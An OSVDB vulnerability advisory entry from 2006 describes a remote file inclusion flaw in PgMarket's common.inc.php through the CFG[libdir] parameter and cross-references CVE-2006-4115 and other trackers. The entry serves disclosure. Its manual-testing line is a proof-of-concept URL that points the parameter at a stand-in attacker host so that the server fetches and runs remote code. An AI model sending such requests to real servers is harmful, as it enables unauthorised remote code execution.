PgMarket common.inc.php CFG[libdir] Variable Remote File Inclusion

2006-08-09T04:17:14
ID OSVDB:29353
Type osvdb
Reporter OSVDB
Modified 2006-08-09T04:17:14

Description

Manual Testing Notes

http://[target]/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0164.html ISS X-Force ID: 28290 FrSIRT Advisory: ADV-2006-3240 CVE-2006-4115 Bugtraq ID: 19439